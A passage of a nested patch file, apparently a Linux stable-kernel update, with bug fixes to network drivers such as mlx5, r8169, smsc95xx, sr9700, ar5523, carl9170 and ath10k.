+-	if (!mlx5e_check_fragmented_striding_rq_cap(mdev, page_shift, umr_mode))
++	if (!mlx5e_check_fragmented_striding_rq_cap(mdev, page_shift, umr_mode)) {
++		mlx5_core_err(mdev, "Striding RQ for XSK can't be activated with page_shift %u and umr_mode %d\n",
++			      page_shift, umr_mode);
+ 		return -EOPNOTSUPP;
++	}
+ 
+-	if (!mlx5e_rx_mpwqe_is_linear_skb(mdev, params, xsk))
++	if (!mlx5e_rx_mpwqe_is_linear_skb(mdev, params, xsk)) {
++		mlx5_core_err(mdev, "Striding RQ linear mode for XSK can't be activated with current params\n");
+ 		return -EINVAL;
++	}
+ 
+ 	/* Current RQ length is too big for the given frame size, the
+ 	 * needed number of WQEs exceeds the maximum.
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/en/xsk/setup.c b/drivers/net/ethernet/mellanox/mlx5/core/en/xsk/setup.c
+index ff03c43833bbf..608d4253799de 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/en/xsk/setup.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/en/xsk/setup.c
+@@ -7,6 +7,18 @@
+ #include "en/health.h"
+ #include <net/xdp_sock_drv.h>
+ 
++static int mlx5e_legacy_rq_validate_xsk(struct mlx5_core_dev *mdev,
++					struct mlx5e_params *params,
++					struct mlx5e_xsk_param *xsk)
++{
++	if (!mlx5e_rx_is_linear_skb(mdev, params, xsk)) {
++		mlx5_core_err(mdev, "Legacy RQ linear mode for XSK can't be activated with current params\n");
++		return -EINVAL;
++	}
++
++	return 0;
++}
++
+ /* The limitation of 2048 can be altered, but shouldn't go beyond the minimal
+  * stride size of striding RQ.
+  */
+@@ -16,9 +28,14 @@ bool mlx5e_validate_xsk_param(struct mlx5e_params *params,
+ 			      struct mlx5e_xsk_param *xsk,
+ 			      struct mlx5_core_dev *mdev)
+ {
+-	/* AF_XDP doesn't support frames larger than PAGE_SIZE. */
+-	if (xsk->chunk_size > PAGE_SIZE || xsk->chunk_size < MLX5E_MIN_XSK_CHUNK_SIZE)
++	/* AF_XDP doesn't support frames larger than PAGE_SIZE,
++	 * and xsk->chunk_size is limited to 65535 bytes.
++	 */
++	if ((size_t)xsk->chunk_size > PAGE_SIZE || xsk->chunk_size < MLX5E_MIN_XSK_CHUNK_SIZE) {
++		mlx5_core_err(mdev, "XSK chunk size %u out of bounds [%u, %lu]\n", xsk->chunk_size,
++			      MLX5E_MIN_XSK_CHUNK_SIZE, PAGE_SIZE);
+ 		return false;
++	}
+ 
+ 	/* frag_sz is different for regular and XSK RQs, so ensure that linear
+ 	 * SKB mode is possible.
+@@ -27,7 +44,7 @@ bool mlx5e_validate_xsk_param(struct mlx5e_params *params,
+ 	case MLX5_WQ_TYPE_LINKED_LIST_STRIDING_RQ:
+ 		return !mlx5e_mpwrq_validate_xsk(mdev, params, xsk);
+ 	default: /* MLX5_WQ_TYPE_CYCLIC */
+-		return mlx5e_rx_is_linear_skb(mdev, params, xsk);
++		return !mlx5e_legacy_rq_validate_xsk(mdev, params, xsk);
+ 	}
+ }
+ 
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/en_accel/en_accel.h b/drivers/net/ethernet/mellanox/mlx5/core/en_accel/en_accel.h
+index 07187028f0d35..1445a9a46baea 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/en_accel/en_accel.h
++++ b/drivers/net/ethernet/mellanox/mlx5/core/en_accel/en_accel.h
+@@ -102,8 +102,14 @@ static inline void
+ mlx5e_udp_gso_handle_tx_skb(struct sk_buff *skb)
+ {
+ 	int payload_len = skb_shinfo(skb)->gso_size + sizeof(struct udphdr);
++	struct udphdr *udphdr;
+ 
+-	udp_hdr(skb)->len = htons(payload_len);
++	if (skb->encapsulation)
++		udphdr = (struct udphdr *)skb_inner_transport_header(skb);
++	else
++		udphdr = udp_hdr(skb);
++
++	udphdr->len = htons(payload_len);
+ }
+ 
+ struct mlx5e_accel_tx_state {
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/en_accel/ipsec_rxtx.h b/drivers/net/ethernet/mellanox/mlx5/core/en_accel/ipsec_rxtx.h
+index 1878a70b9031d..43ccdf0e6cff8 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/en_accel/ipsec_rxtx.h
++++ b/drivers/net/ethernet/mellanox/mlx5/core/en_accel/ipsec_rxtx.h
+@@ -97,18 +97,11 @@ mlx5e_ipsec_feature_check(struct sk_buff *skb, netdev_features_t features)
+ 		if (!x || !x->xso.offload_handle)
+ 			goto out_disable;
+ 
+-		if (xo->inner_ipproto) {
+-			/* Cannot support tunnel packet over IPsec tunnel mode
+-			 * because we cannot offload three IP header csum
+-			 */
+-			if (x->props.mode == XFRM_MODE_TUNNEL)
+-				goto out_disable;
+-
+-			/* Only support UDP or TCP L4 checksum */
+-			if (xo->inner_ipproto != IPPROTO_UDP &&
+-			    xo->inner_ipproto != IPPROTO_TCP)
+-				goto out_disable;
+-		}
++		/* Only support UDP or TCP L4 checksum */
++		if (xo->inner_ipproto &&
++		    xo->inner_ipproto != IPPROTO_UDP &&
++		    xo->inner_ipproto != IPPROTO_TCP)
++			goto out_disable;
+ 
+ 		return features;
+ 
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/en_main.c b/drivers/net/ethernet/mellanox/mlx5/core/en_main.c
+index e7d396434da36..e2f134e1d9fcf 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/en_main.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/en_main.c
+@@ -3666,7 +3666,7 @@ mlx5e_get_stats(struct net_device *dev, struct rtnl_link_stats64 *stats)
+ 		mlx5e_fold_sw_stats64(priv, stats);
+ 	}
+ 
+-	stats->rx_dropped = priv->stats.qcnt.rx_out_of_buffer;
++	stats->rx_missed_errors = priv->stats.qcnt.rx_out_of_buffer;
+ 
+ 	stats->rx_length_errors =
+ 		PPORT_802_3_GET(pstats, a_in_range_length_errors) +
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/en_tx.c b/drivers/net/ethernet/mellanox/mlx5/core/en_tx.c
+index a6d7e2cfcd0e1..e6e792a38a640 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/en_tx.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/en_tx.c
+@@ -153,7 +153,11 @@ mlx5e_tx_get_gso_ihs(struct mlx5e_txqsq *sq, struct sk_buff *skb, int *hopbyhop)
+ 
+ 	*hopbyhop = 0;
+ 	if (skb->encapsulation) {
+-		ihs = skb_inner_tcp_all_headers(skb);
++		if (skb_shinfo(skb)->gso_type & SKB_GSO_UDP_L4)
++			ihs = skb_inner_transport_offset(skb) +
++			      sizeof(struct udphdr);
++		else
++			ihs = skb_inner_tcp_all_headers(skb);
+ 		stats->tso_inner_packets++;
+ 		stats->tso_inner_bytes += skb->len - ihs;
+ 	} else {
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/lag/lag.c b/drivers/net/ethernet/mellanox/mlx5/core/lag/lag.c
+index 01c0e1ee918d8..a283d8ae466b6 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/lag/lag.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/lag/lag.c
+@@ -696,6 +696,7 @@ static bool mlx5_lag_check_prereq(struct mlx5_lag *ldev)
+ 	struct mlx5_core_dev *dev;
+ 	u8 mode;
+ #endif
++	bool roce_support;
+ 	int i;
+ 
+ 	for (i = 0; i < ldev->ports; i++)
+@@ -722,6 +723,11 @@ static bool mlx5_lag_check_prereq(struct mlx5_lag *ldev)
+ 		if (mlx5_sriov_is_enabled(ldev->pf[i].dev))
+ 			return false;
+ #endif
++	roce_support = mlx5_get_roce_state(ldev->pf[MLX5_LAG_P1].dev);
++	for (i = 1; i < ldev->ports; i++)
++		if (mlx5_get_roce_state(ldev->pf[i].dev) != roce_support)
++			return false;
++
+ 	return true;
+ }
+ 
+@@ -884,8 +890,10 @@ static void mlx5_do_bond(struct mlx5_lag *ldev)
+ 		} else if (roce_lag) {
+ 			dev0->priv.flags &= ~MLX5_PRIV_FLAGS_DISABLE_IB_ADEV;
+ 			mlx5_rescan_drivers_locked(dev0);
+-			for (i = 1; i < ldev->ports; i++)
+-				mlx5_nic_vport_enable_roce(ldev->pf[i].dev);
++			for (i = 1; i < ldev->ports; i++) {
++				if (mlx5_get_roce_state(ldev->pf[i].dev))
++					mlx5_nic_vport_enable_roce(ldev->pf[i].dev);
++			}
+ 		} else if (shared_fdb) {
+ 			dev0->priv.flags &= ~MLX5_PRIV_FLAGS_DISABLE_IB_ADEV;
+ 			mlx5_rescan_drivers_locked(dev0);
+diff --git a/drivers/net/ethernet/qlogic/qed/qed_main.c b/drivers/net/ethernet/qlogic/qed/qed_main.c
+index 25d9c254288b5..956ae0206a1f9 100644
+--- a/drivers/net/ethernet/qlogic/qed/qed_main.c
++++ b/drivers/net/ethernet/qlogic/qed/qed_main.c
+@@ -1215,7 +1215,6 @@ static void qed_slowpath_task(struct work_struct *work)
+ static int qed_slowpath_wq_start(struct qed_dev *cdev)
+ {
+ 	struct qed_hwfn *hwfn;
+-	char name[NAME_SIZE];
+ 	int i;
+ 
+ 	if (IS_VF(cdev))
+@@ -1224,11 +1223,11 @@ static int qed_slowpath_wq_start(struct qed_dev *cdev)
+ 	for_each_hwfn(cdev, i) {
+ 		hwfn = &cdev->hwfns[i];
+ 
+-		snprintf(name, NAME_SIZE, "slowpath-%02x:%02x.%02x",
+-			 cdev->pdev->bus->number,
+-			 PCI_SLOT(cdev->pdev->devfn), hwfn->abs_pf_id);
++		hwfn->slowpath_wq = alloc_workqueue("slowpath-%02x:%02x.%02x",
++					 0, 0, cdev->pdev->bus->number,
++					 PCI_SLOT(cdev->pdev->devfn),
++					 hwfn->abs_pf_id);
+ 
+-		hwfn->slowpath_wq = alloc_workqueue(name, 0, 0);
+ 		if (!hwfn->slowpath_wq) {
+ 			DP_NOTICE(hwfn, "Cannot create slowpath workqueue\n");
+ 			return -ENOMEM;
+diff --git a/drivers/net/ethernet/realtek/r8169_main.c b/drivers/net/ethernet/realtek/r8169_main.c
+index 6e3417712e402..f83bd15f9e994 100644
+--- a/drivers/net/ethernet/realtek/r8169_main.c
++++ b/drivers/net/ethernet/realtek/r8169_main.c
+@@ -4263,11 +4263,11 @@ static void rtl8169_doorbell(struct rtl8169_private *tp)
+ static netdev_tx_t rtl8169_start_xmit(struct sk_buff *skb,
+ 				      struct net_device *dev)
+ {
+-	unsigned int frags = skb_shinfo(skb)->nr_frags;
+ 	struct rtl8169_private *tp = netdev_priv(dev);
+ 	unsigned int entry = tp->cur_tx % NUM_TX_DESC;
+ 	struct TxDesc *txd_first, *txd_last;
+ 	bool stop_queue, door_bell;
++	unsigned int frags;
+ 	u32 opts[2];
+ 
+ 	if (unlikely(!rtl_tx_slots_avail(tp))) {
+@@ -4290,6 +4290,7 @@ static netdev_tx_t rtl8169_start_xmit(struct sk_buff *skb,
+ 
+ 	txd_first = tp->TxDescArray + entry;
+ 
++	frags = skb_shinfo(skb)->nr_frags;
+ 	if (frags) {
+ 		if (rtl8169_xmit_frags(tp, skb, opts, entry))
+ 			goto err_dma_1;
+@@ -4607,10 +4608,8 @@ static irqreturn_t rtl8169_interrupt(int irq, void *dev_instance)
+ 		rtl_schedule_task(tp, RTL_FLAG_TASK_RESET_PENDING);
+ 	}
+ 
+-	if (napi_schedule_prep(&tp->napi)) {
+-		rtl_irq_disable(tp);
+-		__napi_schedule(&tp->napi);
+-	}
++	rtl_irq_disable(tp);
++	napi_schedule(&tp->napi);
+ out:
+ 	rtl_ack_events(tp, status);
+ 
+diff --git a/drivers/net/ethernet/smsc/smc91x.h b/drivers/net/ethernet/smsc/smc91x.h
+index c521ea8f94f2f..9c74d25421414 100644
+--- a/drivers/net/ethernet/smsc/smc91x.h
++++ b/drivers/net/ethernet/smsc/smc91x.h
+@@ -175,8 +175,8 @@ static inline void mcf_outsw(void *a, unsigned char *p, int l)
+ 		writew(*wp++, a);
+ }
+ 
+-#define SMC_inw(a, r)		_swapw(readw((a) + (r)))
+-#define SMC_outw(lp, v, a, r)	writew(_swapw(v), (a) + (r))
++#define SMC_inw(a, r)		ioread16be((a) + (r))
++#define SMC_outw(lp, v, a, r)	iowrite16be(v, (a) + (r))
+ #define SMC_insw(a, r, p, l)	mcf_insw(a + r, p, l)
+ #define SMC_outsw(a, r, p, l)	mcf_outsw(a + r, p, l)
+ 
+diff --git a/drivers/net/ethernet/sun/sungem.c b/drivers/net/ethernet/sun/sungem.c
+index 4154e68639ace..940e45bf7a2eb 100644
+--- a/drivers/net/ethernet/sun/sungem.c
++++ b/drivers/net/ethernet/sun/sungem.c
+@@ -948,17 +948,6 @@ static irqreturn_t gem_interrupt(int irq, void *dev_id)
+ 	return IRQ_HANDLED;
+ }
+ 
+-#ifdef CONFIG_NET_POLL_CONTROLLER
+-static void gem_poll_controller(struct net_device *dev)
+-{
+-	struct gem *gp = netdev_priv(dev);
+-
+-	disable_irq(gp->pdev->irq);
+-	gem_interrupt(gp->pdev->irq, dev);
+-	enable_irq(gp->pdev->irq);
+-}
+-#endif
+-
+ static void gem_tx_timeout(struct net_device *dev, unsigned int txqueue)
+ {
+ 	struct gem *gp = netdev_priv(dev);
+@@ -2838,9 +2827,6 @@ static const struct net_device_ops gem_netdev_ops = {
+ 	.ndo_change_mtu		= gem_change_mtu,
+ 	.ndo_validate_addr	= eth_validate_addr,
+ 	.ndo_set_mac_address    = gem_set_mac_address,
+-#ifdef CONFIG_NET_POLL_CONTROLLER
+-	.ndo_poll_controller    = gem_poll_controller,
+-#endif
+ };
+ 
+ static int gem_init_one(struct pci_dev *pdev, const struct pci_device_id *ent)
+diff --git a/drivers/net/ipvlan/ipvlan_core.c b/drivers/net/ipvlan/ipvlan_core.c
+index d447f3076e24a..1d49771d07f4c 100644
+--- a/drivers/net/ipvlan/ipvlan_core.c
++++ b/drivers/net/ipvlan/ipvlan_core.c
+@@ -439,7 +439,7 @@ static noinline_for_stack int ipvlan_process_v4_outbound(struct sk_buff *skb)
+ 
+ 	memset(IPCB(skb), 0, sizeof(*IPCB(skb)));
+ 
+-	err = ip_local_out(net, skb->sk, skb);
++	err = ip_local_out(net, NULL, skb);
+ 	if (unlikely(net_xmit_eval(err)))
+ 		DEV_STATS_INC(dev, tx_errors);
+ 	else
+@@ -494,7 +494,7 @@ static int ipvlan_process_v6_outbound(struct sk_buff *skb)
+ 
+ 	memset(IP6CB(skb), 0, sizeof(*IP6CB(skb)));
+ 
+-	err = ip6_local_out(dev_net(dev), skb->sk, skb);
++	err = ip6_local_out(dev_net(dev), NULL, skb);
+ 	if (unlikely(net_xmit_eval(err)))
+ 		DEV_STATS_INC(dev, tx_errors);
+ 	else
+diff --git a/drivers/net/phy/micrel.c b/drivers/net/phy/micrel.c
+index 2cbb1d1830bbd..98c6d0caf8faf 100644
+--- a/drivers/net/phy/micrel.c
++++ b/drivers/net/phy/micrel.c
+@@ -3245,6 +3245,7 @@ static struct phy_driver ksphy_driver[] = {
+ 	/* PHY_BASIC_FEATURES */
+ 	.probe		= kszphy_probe,
+ 	.config_init	= ksz8061_config_init,
++	.soft_reset	= genphy_soft_reset,
+ 	.config_intr	= kszphy_config_intr,
+ 	.handle_interrupt = kszphy_handle_interrupt,
+ 	.suspend	= kszphy_suspend,
+diff --git a/drivers/net/usb/aqc111.c b/drivers/net/usb/aqc111.c
+index 7b8afa589a53c..284375f662f1e 100644
+--- a/drivers/net/usb/aqc111.c
++++ b/drivers/net/usb/aqc111.c
+@@ -1141,17 +1141,15 @@ static int aqc111_rx_fixup(struct usbnet *dev, struct sk_buff *skb)
+ 			continue;
+ 		}
+ 
+-		/* Clone SKB */
+-		new_skb = skb_clone(skb, GFP_ATOMIC);
++		new_skb = netdev_alloc_skb_ip_align(dev->net, pkt_len);
+ 
+ 		if (!new_skb)
+ 			goto err;
+ 
+-		new_skb->len = pkt_len;
++		skb_put(new_skb, pkt_len);
++		memcpy(new_skb->data, skb->data, pkt_len);
+ 		skb_pull(new_skb, AQ_RX_HW_PAD);
+-		skb_set_tail_pointer(new_skb, new_skb->len);
+ 
+-		new_skb->truesize = SKB_TRUESIZE(new_skb->len);
+ 		if (aqc111_data->rx_checksum)
+ 			aqc111_rx_checksum(new_skb, pkt_desc);
+ 
+diff --git a/drivers/net/usb/qmi_wwan.c b/drivers/net/usb/qmi_wwan.c
+index 45a542659a814..d22ba63160b8d 100644
+--- a/drivers/net/usb/qmi_wwan.c
++++ b/drivers/net/usb/qmi_wwan.c
+@@ -1367,6 +1367,9 @@ static const struct usb_device_id products[] = {
+ 	{QMI_QUIRK_SET_DTR(0x1bc7, 0x1060, 2)},	/* Telit LN920 */
+ 	{QMI_QUIRK_SET_DTR(0x1bc7, 0x1070, 2)},	/* Telit FN990 */
+ 	{QMI_QUIRK_SET_DTR(0x1bc7, 0x1080, 2)}, /* Telit FE990 */
++	{QMI_QUIRK_SET_DTR(0x1bc7, 0x10a0, 0)}, /* Telit FN920C04 */
++	{QMI_QUIRK_SET_DTR(0x1bc7, 0x10a4, 0)}, /* Telit FN920C04 */
++	{QMI_QUIRK_SET_DTR(0x1bc7, 0x10a9, 0)}, /* Telit FN920C04 */
+ 	{QMI_FIXED_INTF(0x1bc7, 0x1100, 3)},	/* Telit ME910 */
+ 	{QMI_FIXED_INTF(0x1bc7, 0x1101, 3)},	/* Telit ME910 dual modem */
+ 	{QMI_FIXED_INTF(0x1bc7, 0x1200, 5)},	/* Telit LE920 */
+diff --git a/drivers/net/usb/smsc95xx.c b/drivers/net/usb/smsc95xx.c
+index 2fa46baa589e5..8e82184be5e7d 100644
+--- a/drivers/net/usb/smsc95xx.c
++++ b/drivers/net/usb/smsc95xx.c
+@@ -879,7 +879,7 @@ static int smsc95xx_start_rx_path(struct usbnet *dev)
+ static int smsc95xx_reset(struct usbnet *dev)
+ {
+ 	struct smsc95xx_priv *pdata = dev->driver_priv;
+-	u32 read_buf, write_buf, burst_cap;
++	u32 read_buf, burst_cap;
+ 	int ret = 0, timeout;
+ 
+ 	netif_dbg(dev, ifup, dev->net, "entering smsc95xx_reset\n");
+@@ -1003,10 +1003,13 @@ static int smsc95xx_reset(struct usbnet *dev)
+ 		return ret;
+ 	netif_dbg(dev, ifup, dev->net, "ID_REV = 0x%08x\n", read_buf);
+ 
++	ret = smsc95xx_read_reg(dev, LED_GPIO_CFG, &read_buf);
++	if (ret < 0)
++		return ret;
+ 	/* Configure GPIO pins as LED outputs */
+-	write_buf = LED_GPIO_CFG_SPD_LED | LED_GPIO_CFG_LNK_LED |
+-		LED_GPIO_CFG_FDX_LED;
+-	ret = smsc95xx_write_reg(dev, LED_GPIO_CFG, write_buf);
++	read_buf |= LED_GPIO_CFG_SPD_LED | LED_GPIO_CFG_LNK_LED |
++		    LED_GPIO_CFG_FDX_LED;
++	ret = smsc95xx_write_reg(dev, LED_GPIO_CFG, read_buf);
+ 	if (ret < 0)
+ 		return ret;
+ 
+@@ -1810,9 +1813,11 @@ static int smsc95xx_reset_resume(struct usb_interface *intf)
+ 
+ static void smsc95xx_rx_csum_offload(struct sk_buff *skb)
+ {
+-	skb->csum = *(u16 *)(skb_tail_pointer(skb) - 2);
++	u16 *csum_ptr = (u16 *)(skb_tail_pointer(skb) - 2);
++
++	skb->csum = (__force __wsum)get_unaligned(csum_ptr);
+ 	skb->ip_summed = CHECKSUM_COMPLETE;
+-	skb_trim(skb, skb->len - 2);
++	skb_trim(skb, skb->len - 2); /* remove csum */
+ }
+ 
+ static int smsc95xx_rx_fixup(struct usbnet *dev, struct sk_buff *skb)
+@@ -1870,25 +1875,22 @@ static int smsc95xx_rx_fixup(struct usbnet *dev, struct sk_buff *skb)
+ 				if (dev->net->features & NETIF_F_RXCSUM)
+ 					smsc95xx_rx_csum_offload(skb);
+ 				skb_trim(skb, skb->len - 4); /* remove fcs */
+-				skb->truesize = size + sizeof(struct sk_buff);
+ 
+ 				return 1;
+ 			}
+ 
+-			ax_skb = skb_clone(skb, GFP_ATOMIC);
++			ax_skb = netdev_alloc_skb_ip_align(dev->net, size);
+ 			if (unlikely(!ax_skb)) {
+ 				netdev_warn(dev->net, "Error allocating skb\n");
+ 				return 0;
+ 			}
+ 
+-			ax_skb->len = size;
+-			ax_skb->data = packet;
+-			skb_set_tail_pointer(ax_skb, size);
++			skb_put(ax_skb, size);
++			memcpy(ax_skb->data, packet, size);
+ 
+ 			if (dev->net->features & NETIF_F_RXCSUM)
+ 				smsc95xx_rx_csum_offload(ax_skb);
+ 			skb_trim(ax_skb, ax_skb->len - 4); /* remove fcs */
+-			ax_skb->truesize = size + sizeof(struct sk_buff);
+ 
+ 			usbnet_skb_return(dev, ax_skb);
+ 		}
+diff --git a/drivers/net/usb/sr9700.c b/drivers/net/usb/sr9700.c
+index 3164451e1010c..0a662e42ed965 100644
+--- a/drivers/net/usb/sr9700.c
++++ b/drivers/net/usb/sr9700.c
+@@ -421,19 +421,15 @@ static int sr9700_rx_fixup(struct usbnet *dev, struct sk_buff *skb)
+ 			skb_pull(skb, 3);
+ 			skb->len = len;
+ 			skb_set_tail_pointer(skb, len);
+-			skb->truesize = len + sizeof(struct sk_buff);
+ 			return 2;
+ 		}
+ 
+-		/* skb_clone is used for address align */
+-		sr_skb = skb_clone(skb, GFP_ATOMIC);
++		sr_skb = netdev_alloc_skb_ip_align(dev->net, len);
+ 		if (!sr_skb)
+ 			return 0;
+ 
+-		sr_skb->len = len;
+-		sr_skb->data = skb->data + 3;
+-		skb_set_tail_pointer(sr_skb, len);
+-		sr_skb->truesize = len + sizeof(struct sk_buff);
++		skb_put(sr_skb, len);
++		memcpy(sr_skb->data, skb->data + 3, len);
+ 		usbnet_skb_return(dev, sr_skb);
+ 
+ 		skb_pull(skb, len + SR_RX_OVERHEAD);
+diff --git a/drivers/net/wireless/ath/ar5523/ar5523.c b/drivers/net/wireless/ath/ar5523/ar5523.c
+index ce3d613fa36c4..2833e2206cc88 100644
+--- a/drivers/net/wireless/ath/ar5523/ar5523.c
++++ b/drivers/net/wireless/ath/ar5523/ar5523.c
+@@ -1589,6 +1589,20 @@ static int ar5523_probe(struct usb_interface *intf,
+ 	struct ar5523 *ar;
+ 	int error = -ENOMEM;
+ 
++	static const u8 bulk_ep_addr[] = {
++		AR5523_CMD_TX_PIPE | USB_DIR_OUT,
++		AR5523_DATA_TX_PIPE | USB_DIR_OUT,
++		AR5523_CMD_RX_PIPE | USB_DIR_IN,
++		AR5523_DATA_RX_PIPE | USB_DIR_IN,
++		0};
++
++	if (!usb_check_bulk_endpoints(intf, bulk_ep_addr)) {
++		dev_err(&dev->dev,
++			"Could not find all expected endpoints\n");
++		error = -ENODEV;
++		goto out;
++	}
++
+ 	/*
+ 	 * Load firmware if the device requires it.  This will return
+ 	 * -ENXIO on success and we'll get called back afer the usb
+diff --git a/drivers/net/wireless/ath/ath10k/core.c b/drivers/net/wireless/ath/ath10k/core.c
+index 6cdb225b7eacc..81058be3598f1 100644
+--- a/drivers/net/wireless/ath/ath10k/core.c
++++ b/drivers/net/wireless/ath/ath10k/core.c
+@@ -704,6 +704,9 @@ static const struct ath10k_hw_params ath10k_hw_params_list[] = {
+ 		.max_spatial_stream = 4,
+ 		.fw = {
+ 			.dir = WCN3990_HW_1_0_FW_DIR,
++			.board = WCN3990_HW_1_0_BOARD_DATA_FILE,
++			.board_size = WCN3990_BOARD_DATA_SZ,
++			.board_ext_size = WCN3990_BOARD_EXT_DATA_SZ,
+ 		},
+ 		.sw_decrypt_mcast_mgmt = true,
+ 		.rx_desc_ops = &wcn3990_rx_desc_ops,
+diff --git a/drivers/net/wireless/ath/ath10k/debugfs_sta.c b/drivers/net/wireless/ath/ath10k/debugfs_sta.c
+index 87a3365330ff8..5598cf706daab 100644
+--- a/drivers/net/wireless/ath/ath10k/debugfs_sta.c
++++ b/drivers/net/wireless/ath/ath10k/debugfs_sta.c
+@@ -438,7 +438,7 @@ ath10k_dbg_sta_write_peer_debug_trigger(struct file *file,
+ 	}
+ out:
+ 	mutex_unlock(&ar->conf_mutex);
+-	return count;
++	return ret ?: count;
+ }
+ 
+ static const struct file_operations fops_peer_debug_trigger = {
+diff --git a/drivers/net/wireless/ath/ath10k/hw.h b/drivers/net/wireless/ath/ath10k/hw.h
+index 9643031a4427a..7ecdd0011cfa4 100644
+--- a/drivers/net/wireless/ath/ath10k/hw.h
++++ b/drivers/net/wireless/ath/ath10k/hw.h
+@@ -132,6 +132,7 @@ enum qca9377_chip_id_rev {
+ /* WCN3990 1.0 definitions */
+ #define WCN3990_HW_1_0_DEV_VERSION	ATH10K_HW_WCN3990
+ #define WCN3990_HW_1_0_FW_DIR		ATH10K_FW_DIR "/WCN3990/hw1.0"
++#define WCN3990_HW_1_0_BOARD_DATA_FILE "board.bin"
+ 
+ #define ATH10K_FW_FILE_BASE		"firmware"
+ #define ATH10K_FW_API_MAX		6
+diff --git a/drivers/net/wireless/ath/ath10k/targaddrs.h b/drivers/net/wireless/ath/ath10k/targaddrs.h
+index ec556bb88d658..ba37e6c7ced08 100644
+--- a/drivers/net/wireless/ath/ath10k/targaddrs.h
++++ b/drivers/net/wireless/ath/ath10k/targaddrs.h
+@@ -491,4 +491,7 @@ struct host_interest {
+ #define QCA4019_BOARD_DATA_SZ	  12064
+ #define QCA4019_BOARD_EXT_DATA_SZ 0
+ 
++#define WCN3990_BOARD_DATA_SZ	  26328
++#define WCN3990_BOARD_EXT_DATA_SZ 0
++
+ #endif /* __TARGADDRS_H__ */
+diff --git a/drivers/net/wireless/ath/ath10k/wmi.c b/drivers/net/wireless/ath/ath10k/wmi.c
+index 980d4124fa287..8a5a44d75b141 100644
+--- a/drivers/net/wireless/ath/ath10k/wmi.c
++++ b/drivers/net/wireless/ath/ath10k/wmi.c
+@@ -1762,12 +1762,32 @@ void ath10k_wmi_put_wmi_channel(struct ath10k *ar, struct wmi_channel *ch,
+ 
+ int ath10k_wmi_wait_for_service_ready(struct ath10k *ar)
+ {
+-	unsigned long time_left;
++	unsigned long time_left, i;
+ 
+ 	time_left = wait_for_completion_timeout(&ar->wmi.service_ready,
+ 						WMI_SERVICE_READY_TIMEOUT_HZ);
+-	if (!time_left)
+-		return -ETIMEDOUT;
++	if (!time_left) {
++		/* Sometimes the PCI HIF doesn't receive interrupt
++		 * for the service ready message even if the buffer
++		 * was completed. PCIe sniffer shows that it's
++		 * because the corresponding CE ring doesn't fires
++		 * it. Workaround here by polling CE rings once.
++		 */
++		ath10k_warn(ar, "failed to receive service ready completion, polling..\n");
++
++		for (i = 0; i < CE_COUNT; i++)
++			ath10k_hif_send_complete_check(ar, i, 1);
++
++		time_left = wait_for_completion_timeout(&ar->wmi.service_ready,
++							WMI_SERVICE_READY_TIMEOUT_HZ);
++		if (!time_left) {
++			ath10k_warn(ar, "polling timed out\n");
++			return -ETIMEDOUT;
++		}
++
++		ath10k_warn(ar, "service ready completion received, continuing normally\n");
++	}
++
+ 	return 0;
+ }
+ 
+diff --git a/drivers/net/wireless/ath/ath11k/mac.c b/drivers/net/wireless/ath/ath11k/mac.c
+index 51fc77e93de5c..b863ead198bda 100644
+--- a/drivers/net/wireless/ath/ath11k/mac.c
++++ b/drivers/net/wireless/ath/ath11k/mac.c
+@@ -1226,14 +1226,7 @@ static int ath11k_mac_vif_setup_ps(struct ath11k_vif *arvif)
+ 
+ 	enable_ps = arvif->ps;
+ 
+-	if (!arvif->is_started) {
+-		/* mac80211 can update vif powersave state while disconnected.
+-		 * Firmware doesn't behave nicely and consumes more power than
+-		 * necessary if PS is disabled on a non-started vdev. Hence
+-		 * force-enable PS for non-running vdevs.
+-		 */
+-		psmode = WMI_STA_PS_MODE_ENABLED;
+-	} else if (enable_ps) {
++	if (enable_ps) {
+ 		psmode = WMI_STA_PS_MODE_ENABLED;
+ 		param = WMI_STA_PS_PARAM_INACTIVITY_TIME;
+ 
+diff --git a/drivers/net/wireless/ath/carl9170/tx.c b/drivers/net/wireless/ath/carl9170/tx.c
+index 6bb9aa2bfe654..88ef6e023f826 100644
+--- a/drivers/net/wireless/ath/carl9170/tx.c
++++ b/drivers/net/wireless/ath/carl9170/tx.c
+@@ -280,7 +280,8 @@ static void carl9170_tx_release(struct kref *ref)
+ 	 * carl9170_tx_fill_rateinfo() has filled the rate information
+ 	 * before we get to this point.
+ 	 */
+-	memset_after(&txinfo->status, 0, rates);
++	memset(&txinfo->pad, 0, sizeof(txinfo->pad));
++	memset(&txinfo->rate_driver_data, 0, sizeof(txinfo->rate_driver_data));
+ 
+ 	if (atomic_read(&ar->tx_total_queued))
+ 		ar->tx_schedule = true;
+diff --git a/drivers/net/wireless/ath/carl9170/usb.c b/drivers/net/wireless/ath/carl9170/usb.c
+index e4eb666c6eea4..a5265997b5767 100644
+--- a/drivers/net/wireless/ath/carl9170/usb.c
++++ b/drivers/net/wireless/ath/carl9170/usb.c
+@@ -1069,6 +1069,38 @@ static int carl9170_usb_probe(struct usb_interface *intf,
+ 			ar->usb_ep_cmd_is_bulk = true;
+ 	}
+ 
++	/* Verify that all expected endpoints are present */
++	if (ar->usb_ep_cmd_is_bulk) {
++		u8 bulk_ep_addr[] = {
++			AR9170_USB_EP_RX | USB_DIR_IN,
++			AR9170_USB_EP_TX | USB_DIR_OUT,
++			AR9170_USB_EP_CMD | USB_DIR_OUT,
++			0};
++		u8 int_ep_addr[] = {
++			AR9170_USB_EP_IRQ | USB_DIR_IN,
++			0};
++		if (!usb_check_bulk_endpoints(intf, bulk_ep_addr) ||
++		    !usb_check_int_endpoints(intf, int_ep_addr))
++			err = -ENODEV;
++	} else {
++		u8 bulk_ep_addr[] = {
++			AR9170_USB_EP_RX | USB_DIR_IN,
